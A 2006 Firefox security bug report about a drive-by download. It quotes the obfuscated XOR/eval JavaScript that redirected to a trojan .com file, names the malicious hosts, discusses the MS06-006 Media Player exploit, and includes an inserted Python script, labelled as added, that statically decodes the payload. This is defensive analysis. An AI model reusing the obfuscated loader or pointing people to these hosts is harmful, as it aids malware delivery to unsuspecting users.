Closed Bug 350457 Opened 19 years ago Closed 19 years ago

Security hole, allows redirect to malicious .com file

Categories

(Firefox :: Security, defect)

x86
Windows XP
defect
Not set
critical


RESOLVED INVALID

People

(Reporter: igitur, Unassigned)


Details

(Whiteboard: [sg:investigate])

Attachments

(1 file)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

Please don't follow the link if you don't have decent anti-virus software. F-Prot found the virus that Firefox let through.

Using Fiddler I found that the above link does a series of redirects using obfuscated JavaScript (too complicated for me to understand). The last redirect is with this code:

<script >YlSlzNpIGOj=new Function("REfIM","ISTPNJkDxKeaEsf='';for(gKFP=0;REfIM.length>gKFP;gKFP+=2)ISTPNJkDxKeaEsf+=String.fromCharCode(parseInt(REfIM.substr(gKFP,2),16)^195);return ISTPNJkDxKeaEsf");eval(YlSlzNpIGOj("aaa5ebada2b5aaa4a2b7acb1edb3afa2b7a5acb1aefefee494aaadf0f1e4eaafaca0a2b7aaacadedabb1a6a5fee4b4b4b4eda4acaca4afa6eda0acaee4"))</script >

That redirects to a .com file that my PC tries to execute... and F-Prot luckily prevented that. F-Prot gives this message:

Malicious code found in file C:\DOCUMENTS AND SETTINGS\E910102\LOCAL SETTINGS\TEMP\NPNEMB8I.COM.
Infection: Trojan.Win32.Obfuscated.a
Action: The file was deleted.

Reproducible: Always

Steps to Reproduce:
1. Follow the link (be careful)
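As an added analysis example (not part of the bug report or of any Mozilla code), the Python below performs the same transform the quoted Function body does, two hex digits per byte XOR 195 then fromCharCode, statically, so the payload can be read without ever passing it to eval. The helper that pulls the key and the hex argument out of a script is an assumption about the shape of this obfuscator, not something the report states; run on the quoted string it yields a Win32 platform check followed by a redirect to the relative URL www.google.com, which matches the later comments.

```python
"""Static decoder for the XOR-hex obfuscation quoted in comment 0."""
import re

# Hex argument copied verbatim from the <script> in the report.
PAYLOAD_HEX = ("aaa5ebada2b5aaa4a2b7acb1edb3afa2b7a5acb1aefefee494aaadf0f1e4ea"
               "afaca0a2b7aaacadedabb1a6a5fee4b4b4b4eda4acaca4afa6eda0acaee4")
XOR_KEY = 195  # the literal "^195" in the obfuscator's Function body


def decode_xor_hex(hex_str: str, key: int = XOR_KEY) -> str:
    """Reproduce the decoder loop: chr(int(pair, 16) ^ key) per hex pair."""
    if len(hex_str) % 2:
        raise ValueError("odd-length hex string")
    return "".join(chr(int(hex_str[i:i + 2], 16) ^ key)
                   for i in range(0, len(hex_str), 2))


def find_xor_key(script: str) -> int:
    """Recover the XOR constant from a script of this shape (assumed pattern:
    'parseInt(...,16)^NNN)' inside the decoder body)."""
    m = re.search(r"\^\s*(\d+)\)", script)
    if not m:
        raise ValueError("no XOR key found")
    return int(m.group(1))


def extract_payloads(script: str) -> list:
    """Return every hex string passed to a one-argument call inside eval().
    Identifier names are random per sample, so match on shape, not names."""
    return re.findall(r'eval\(\w+\("([0-9a-fA-F]+)"\)\)', script)


def decode_script(script: str) -> list:
    """Decode all payloads found in a script using its own recovered key."""
    key = find_xor_key(script)
    return [decode_xor_hex(p, key) for p in extract_payloads(script)]


if __name__ == "__main__":
    print(decode_xor_hex(PAYLOAD_HEX))
```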
What is the location of that .com file? I don't get a download dialog. I see that page contains an iframe with this location view-source:http://www.installare.net/e/ads.php?b=788 That code is filling all available memory I have on my computer. When I open that page locally, my McAfee virusscanner begins to complain about the Exploit-IframeBO!shellcode virus. This is mentioned here: http://vil.nai.com/vil/datreadme.aspx?seldatfiles=4405 From http://gathering.tweakers.net/forum/list_messages/978944 I get the information this is: http://secunia.com/advisories/12959/ which is an IE exploit.
Are you sure Firefox tried to *execute* the .com file? Many virus scanners complain if a malicious file is simply downloaded, e.g. to the cache or download directory.
(In reply to comment #2)
> Are you sure Firefox tried to *execute* the .com file? Many virus scanners
> complain if a malicious file is simply downloaded, e.g. to the cache or
> download directory.

Jesse, true, I can't confirm that my PC actually tried to execute the file or just downloaded it. Either way... I'm not comfortable having that code on my PC, and if we can get Firefox not to download it at all, it would be great.

Martijn, I'll attach the full HTTP sessions tomorrow to illustrate all the redirects, including the final .com file.
Which is www.google.com? I went to http://1.mp3liede.org/c33c5def/50311/1/www.google.com but that returns 404 to me.
The URL is http://td8eau9td.com/c33c5def/50311/1/www.google.com The previous redirects should've taken you to td8eau9td.com. It's possible that the td8eau9td, c33c5def and 50311 were randomly generated and deleted and that it's just our cache that still persists them. For another person they might be different.
What version of Windows Media Player do you have? I haven't de-obfuscated this yet, but the two times I've seen this style of obfuscation (using in part the length of the deobfuscating function as a key) it used the MS06-006 Windows Media Player vulnerability to download its attack code (which was a different payload, but those change all the time so that means nothing). I notice that one of the files it tries to get is called "nt_wmp.htm" which reinforces my suspicion, but I'll know for sure when I decode it. In the meanwhile check with Windows Update and make sure you've got the latest everything, or run the MS "Baseline Security Analyzer" which you can get from microsoft.com and will check to make sure you've applied all their patches. http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx (contains link to the Baseline Security Analyzer, too). This is, at this point, just a guess. If someone beats me to the de-obfuscation, what you're looking for is some script that preps memory with repeats of the attack code, and then an <embed> or <object> with a really, really long URL.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:investigate]
Before installing security patches, my WMP version is 10.00.00.4036 After installing security patches, my WMP version is STILL 10.00.00.4036, but the redirects to the "virus" don't occur anymore. So thank you, seems this was a Microsoft error. Never thought it could affect Firefox. Issue closed?
Hey guys... Must I close this issue? It was my first ever bug report, so I'm still new to the procedure.
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → INVALID
Group: security